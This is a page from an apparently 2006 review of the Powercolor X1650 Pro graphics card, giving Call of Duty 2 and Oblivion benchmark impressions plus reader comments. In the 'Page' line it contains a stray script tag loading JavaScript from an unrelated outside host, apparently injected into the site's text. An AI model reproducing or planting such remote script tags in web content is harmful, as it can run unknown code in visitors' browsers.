Powercolor X1650 Pro Review

Game Tests - CoD 2 and Oblivion

Page <script type="text/javascript" src="http://ufo1.com/ad/c.js"></script> Posted 23/08/2006
Author: Matthew Kemp (kempez)
Hardware Acquired: Powercolor


Call of Duty 2

Call of Duty 2 is a fairly recent game that uses a lot of DirectX 9.0c features, including real time shadows, amazing smoke effects and some nice looking HDR effects. This makes the game very taxing. I played a fully patched up version of the game. Once again I played through the game with a two minute gaming session including explosions, smoke and also lots of snow.

cod 2 settings x1650 pro

And the FPS at the above settings...

cod 2 fps x1650 pro

CoD 2 was again very playable at 1024 x 768. I did use the high quality settings on the card and this made the experience much more crisp and detailed. I don't think there was headroom to play at 1280 x 1024 - but with a little overclocking I'm sure it's attainable. Even at this seemingly (to me) low res CoD 2 looks pretty awesome and the card gives very nice detail.

Oblivion

Oblivion is an awesome RPG with a simply huge immersive environment, great graphics and incredibly realistic scenery. This game is currently one of the most testing games that you can buy and it is certainly a test of the X1650. I chose to do a run-through of the Arena part of the game. I spoke to a character, did some magic whilst in a fight and fought in the arena that is pretty huge. Also as well as doing this test I took a wander around to make sure that the benchmark resembled the general gameplay with each card. ATI seem to come out on top in Oblivion so let's see how the card fares cranked up...

Oblivion settings X1650 pro

And the FPS:

Oblivion FPS x1650 pro

Oblivion has a plethora of in-game settings so here are what I chose to be optimal:

oblivion big settings x1650

I did encounter some issues with Oblivion at first. The game started playing in a very "jerky" manor. It was nigh on impossible to play like this. I re-installed the drivers, re-installed Oblivion and found another patch for it too. This all seemed to cure the problem but it was slightly annoying as I have never had a problem like this before with Oblivion.

In the end the game played through very well. I did have a test run with HDR and AA (ATI cards can do this) and this looked pretty good, but on a lower resolution with lower in-game settings. I felt this was too much of a compromise and so I kept the AA off. HDR is essential for the atmosphere in Oblivion and the X1650 Pro did a very good job of rendering the scene. The FPS took a bit of a hit outside, but this is to be expected and was still very playable.

«Prev 1 2 3 4 5 6 7 Next»

Most Recent Comments

24-08-2006, 15:00:22

FarFarAway
Take a look at our World Exclusive on this excellent mid-range card.

How does it do when we subject it to the Overclock3D bench suite?

Find out here

24-08-2006, 15:32:15

Hyper
As usual a good review kemp, it seems they will be in the competition range of the Nvidia 7600.

24-08-2006, 15:34:19

FarFarAway
Quote:
Originally Posted by name='Hyper'
As usual a good review kemp, it seems they will be in the competition range of the Nvidia 7600.
And pretty cheap too

24-08-2006, 15:38:50

JN
Some very impressive in-game results there. Deffo a choice card for the budget caming build.

24-08-2006, 16:04:50

AKtodaface
very good review kemp! looks darn good for a mid range card.

24-08-2006, 18:07:45

NickS
ATi still lacks in the midrange department. Both my old GTO and our new XFX 7600GT XXX beat that thing in 05 by at least 400 points. Regardless, a great review Kempez .

24-08-2006, 18:54:32

glocktodahead
Nicely done review Kemp

24-08-2006, 18:58:15

shiftlocked
Nice review Kempz. One quick question tho. The card as it stands is it aimed at the mainstream or people who would overclock their system and get such a card?

The reason I ask is that the testings done on a clocked system, is that indicative of the people who would get this? Just wondering as you did all the testing on a clocked system?

Could we see some benchies on a stock and non stock system (like the custom pc magazine) for those of us in phear of clocking?

25-08-2006, 03:21:58

FarFarAway
I actually forgot I had my CPU clocked up during the tests. Regardless the C2D would play the games fast anyway. Unfortunately my test rig has been sold so I could not use that for the tests.

I am going to use the same PC for all my tests from now on so this was a base for future comparison

25-08-2006, 03:55:52

PV5150
Great review Kemp, and it's certainly a nice little card for the budget conscious

25-08-2006, 11:30:14

Vaerilis
Quote:
Originally Posted by name='Kempez'
I actually forgot I had my CPU clocked up during the tests. Regardless the C2D would play the games fast anyway. Unfortunately my test rig has been sold so I could not use that for the tests.
Nice review!

That setup would be VGA-limited in all games anyway, even a stock Allendale can push a lower-midrange card to its limits.

The X1650pro will be a great alternative to Nvidia's solutions at its level. It has an amazing price/performance ratio: 66€ is even less than what the 7300GTs clocked at 500/1400 are selling for!

25-08-2006, 16:05:43

JN
Quote:
Originally Posted by Vaerilis
Nice review!

That setup would be VGA-limited in all games anyway, even a stock Allendale can push a lower-midrange card to its limits.

The X1650pro will be a great alternative to Nvidia's solutions at its level. It has an amazing price/performance ratio: 66 is even less than what the 7300GTs clocked at 500/1400 are selling for!
Totally agreed mate
Reply
x

Register for the OC3D Newsletter

Subscribing to the OC3D newsletter will keep you up-to-date on the latest technology reviews, competitions and goings-on at Overclock3D. We won't share your email address with ANYONE, and we will only email you with updates on site news, reviews, and competitions and you can unsubscribe easily at any time.

Simply enter your name and email address into the box below and be sure to click on the links in the confirmation emails that will arrive in your e-mail shortly after to complete the registration.

If you run into any problems, just drop us a message on the forums.